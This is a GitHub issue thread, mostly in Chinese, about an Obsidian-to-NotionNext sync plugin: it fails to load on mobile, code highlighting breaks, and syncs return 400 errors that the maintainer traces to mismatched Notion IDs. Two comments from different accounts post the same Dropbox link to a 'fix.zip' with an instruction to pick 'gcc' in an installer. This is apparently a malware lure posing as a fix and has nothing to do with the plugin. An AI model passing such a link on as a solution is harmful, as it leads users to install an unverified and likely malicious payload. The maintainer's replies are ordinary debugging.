### ISSUE TITLE
mobile phone failed to load plugin effect desktop application and code block hightlight error

### ISSUE THREAD

**Issue by codebysandwich** [jxpeng98/obsidian-to-NotionNext#33]
感谢您的插件，目前发现两个问题不知如何解决
1. 手机端打开obsidian app会出现插件 `failed to load plugin` 同时如果后续客户端重启后会出现插件自动禁用，需要重新启用插件（如果再使用手机端重复这个问题）。由于手机端无法使用插件是否考虑插件默认只在桌面端工作，像`image auto upload plugin`一样
2. 代码段发现一个问题同步后高亮异常，以python 代码为例
```python
import torch # 注意torch 不是pytorch
```
插件导入无法高亮，手动复制进notion是可以高亮的

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by jxpeng98** [comment]
感谢反馈，

之前手机端是可以同步的。最近几个版本代码修改比较频繁，而且没有手机端同步的需求，所以没有测试。我再测试一下看看问题。

第二个代码高亮是因为在爬code块的时候，额外添加了一个注释块。这个会在下一个版本修复。

**Comment by jxpeng98** [comment]
@codebysandwich 
代码高亮问题已经修复了。你可以试一下最新版本`v2.4.1`。

**Comment by codebysandwich** [comment]
> @codebysandwich 代码高亮问题已经修复了。你可以试一下最新版本`v2.4.1`。

感谢您的更新，测试了下目前没发现什么问题

另外有一点想了解下，我发现第一次同步如果文章过长好像会有100个blocks的限制导致400错误，分两次更新好像不会有错，我测试了下第二次更新数量应该超过100blocks也没有报400；是否有办法在第一次或者说更新文档的时候检查blocks数量分批同步来避免，PS发现可以更新已同步的文档确实很惊喜

感谢您的更新!

**Comment by codebysandwich** [comment]
> > @codebysandwich 代码高亮问题已经修复了。你可以试一下最新版本`v2.4.1`。
> 
> 感谢您的更新，测试了下目前没发现什么问题
> 
> 另外有一点想了解下，我发现第一次同步如果文章过长好像会有100个blocks的限制导致400错误，分两次更新好像不会有错，我测试了下第二次更新数量应该超过100blocks也没有报400；是否有办法在第一次或者说更新文档的时候检查blocks数量分批同步来避免，PS发现可以更新已同步的文档确实很惊喜
> 
> 感谢您的更新!

我的意思是，第一次如果检测多于100blocks，先上传100或以内，然后拿到notionID后再同步余下的blocks，避免400错误
只是一个想法不知道是否可行

**Comment by codebysandwich** [comment]
自己测试感觉同步是删除原来的page再重新同步到notion，今天写文章慢慢同步发现文章长了后还是会出现400错误😭

**Comment by jxpeng98** [comment]
> > > @codebysandwich 代码高亮问题已经修复了。你可以试一下最新版本`v2.4.1`。
> > 
> > 
> > 感谢您的更新，测试了下目前没发现什么问题
> > 另外有一点想了解下，我发现第一次同步如果文章过长好像会有100个blocks的限制导致400错误，分两次更新好像不会有错，我测试了下第二次更新数量应该超过100blocks也没有报400；是否有办法在第一次或者说更新文档的时候检查blocks数量分批同步来避免，PS发现可以更新已同步的文档确实很惊喜
> > 感谢您的更新!
> 
> 我的意思是，第一次如果检测多于100blocks，先上传100或以内，然后拿到notionID后再同步余下的blocks，避免400错误 只是一个想法不知道是否可行

版本`2.4.0`之后，就是这么同步的。把长文章给分割成小的。如果你还出现400的错误，你去控制台`control + alt + I` 或者`option + command + I`看一下具体的错误内容，然后截图给我。我看看是怎么回事。我之前测试的，长文章已经不会出现这个错误了。



> 自己测试感觉同步是删除原来的page再重新同步到notion，今天写文章慢慢同步发现文章长了后还是会出现400错误😭

是的，如果要更新的话，就是把之前的删掉，重新创建文章。因为检测修改太麻烦了。

**Comment by codebysandwich** [comment]
<img width="552" alt="image" src="https://github.com/user-attachments/assets/5ff1184e-5615-4eb4-936d-91a70ae27cca">
提示是400错误，js调试没什么经验，我看信息好像不是blocks太多导致的，之前见过100的限制会有信息提示，不知道这样能不能看出问题所在

**Comment by codebysandwich** [comment]
<img width="549" alt="image" src="https://github.com/user-attachments/assets/250bda55-e90c-4f5b-b80b-24bbc369948b">

**Comment by jxpeng98** [comment]
这个问题不是长文章的问题。

每一次上传在转换block之后都会检测block的长度，然后自动分割。

这个是一个长文章的上传过程。
<img width="396" alt="image" src="https://github.com/user-attachments/assets/5b26fe1a-1381-48b8-bd8e-bbdb33805c33">
先检测到183个块，然后先上传前100个，后边的也是每100个上传一次。 


> <img alt="image" width="549" src="https://private-user-images.githubusercontent.com/32191093/362578895-250bda55-e90c-4f5b-b80b-24bbc369948b.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ5MjU0NDQsIm5iZiI6MTcyNDkyNTE0NCwicGF0aCI6Ii8zMjE5MTA5My8zNjI1Nzg4OTUtMjUwYmRhNTUtZTkwYy00ZjViLWI4MGItMjRiYmMzNjk5NDhiLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjklMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI5VDA5NTIyNFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTgyMjI3ZGI5YWE3MDViZjI1MjQwODk3ZDhmZGM0M2U0NTg5YWRhYjI5MzYzODJlMTAxY2U5ZDg0NDk2ZDM0ZjYmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.gbh4jFXqkOSjBQBLmxckN68nTf7fKVl58H49ca73UKo">

你这里边400的错误是因为同步之后的notion id识别错误。像上边我给的这个测试，notion ID是`67dc1a79-9ab7-4446-9689-18f46bd357d3`，然后在front matter随便删除几个字母把notion ID改成 `67dc1a79-9ab7-4446-9689`。 

再点击同步，就会出现和你一样的错误。
<img width="422" alt="image" src="https://github.com/user-attachments/assets/15efd29c-3a09-4f10-9920-27c8b782860a">

如果出现这个错误，你可以考虑直接在markdown表头把生成的`notionid`删除，再同步。就没问题了
<img width="406" alt="image" src="https://github.com/user-attachments/assets/1e4bfd8b-9731-477f-a55d-4e192f1e5677">

**Comment by codebysandwich** [comment]
我回忆了下过程，我之前试过将notionID 和link都删了重新上传，是有问题的；我之前自己手动删除过Notion里已经同步的页面。
1. 我手动删除过，后来同步成功
2. 后来重新同步一直出400
3. 删除notionID和Notion里的page还是一直重复400
4. 刚刚结合您的提示想到这些过程，**我重启了下obsidan，其他都没操作，重启前报错，重启后成功**
可能是自己手动删了notion里的页面导致自己删除ob里的NotionID不生效，不知是不是影响了缓存导致没有识别NotionID已经被删除而一直用缓存中的NotionID 所导致了
重启ob可解，感谢您的回答，解决了我的疑惑

**Comment by codebysandwich** [comment]
中间最有可能出问题的环节是：
1. 我手动修改了同步的notion页面（ob 与 notion 的callout语法不一致， 手动改了notion里的内容）
2. 然后在ob的markdown里做了新增，再进行同步的时候有一个报错没有注意
3. 但是后来还是同步成功了，就没注意。
4. 直到同步了3-4次后（中间不确定有没有删除notion页面）出现了400，就一直不行，删了Notion ID 和Notion里的页面也不行
5. 重启就恢复了
后面看看能不能复现这个问题

**Comment by jxpeng98** [comment]
> 我回忆了下过程，我之前试过将notionID 和link都删了重新上传，是有问题的；我之前自己手动删除过Notion里已经同步的页面。
> 
> 1. 我手动删除过，后来同步成功
> 
> 2. 后来重新同步一直出400
> 
> 3. 删除notionID和Notion里的page还是一直重复400
> 
> 4. 刚刚结合您的提示想到这些过程，**我重启了下obsidan，其他都没操作，重启前报错，重启后成功**
> 
> 可能是自己手动删了notion里的页面导致自己删除ob里的NotionID不生效，不知是不是影响了缓存导致没有识别NotionID已经被删除而一直用缓存中的NotionID 所导致了
> 
> 重启ob可解，感谢您的回答，解决了我的疑惑

@codebysandwich 
同步的流程就是：

如果在obsidian的文件表头存在id的时候，会先去notion搜索这个id页面，然后删除。再重新创建新的。不论是手动删除notion的页面和我说的修改obsidian markdown的id，这两种都没办法把obsidian和notion的id匹配起来，无法匹配就是返回400错误。

所以手动删除notion页面之后，只需要把obsidian里生成的id删掉就行了。

**Comment by codebysandwich** [comment]
> > 我回忆了下过程，我之前试过将notionID 和link都删了重新上传，是有问题的；我之前自己手动删除过Notion里已经同步的页面。
> > 
> > 1. 我手动删除过，后来同步成功
> > 2. 后来重新同步一直出400
> > 3. 删除notionID和Notion里的page还是一直重复400
> > 4. 刚刚结合您的提示想到这些过程，**我重启了下obsidan，其他都没操作，重启前报错，重启后成功**
> > 
> > 可能是自己手动删了notion里的页面导致自己删除ob里的NotionID不生效，不知是不是影响了缓存导致没有识别NotionID已经被删除而一直用缓存中的NotionID 所导致了
> > 重启ob可解，感谢您的回答，解决了我的疑惑
> 
> @codebysandwich 同步的流程就是：
> 
> 如果在obsidian的文件表头存在id的时候，会先去notion搜索这个id页面，然后删除。再重新创建新的。不论是手动删除notion的页面和我说的修改obsidian markdown的id，这两种都没办法把obsidian和notion的id匹配起来，无法匹配就是返回400错误。
> 
> 所以手动删除notion页面之后，只需要把obsidian里生成的id删掉就行了。

感谢您的解答，理解了这个流程。
我也观察了手动删除的notion页面在notion回收站里还存在，但是同步失败的却不会
另外，在重启之前我也试过Notionid删除再重新同步，还是不成功。
这个现象就像拿着notionid的缓存去notion里匹配了，不知哪里出了问题在没有notionid的情况下没有重新新建新的notion页面。
我后面多用多观察看是否会复现
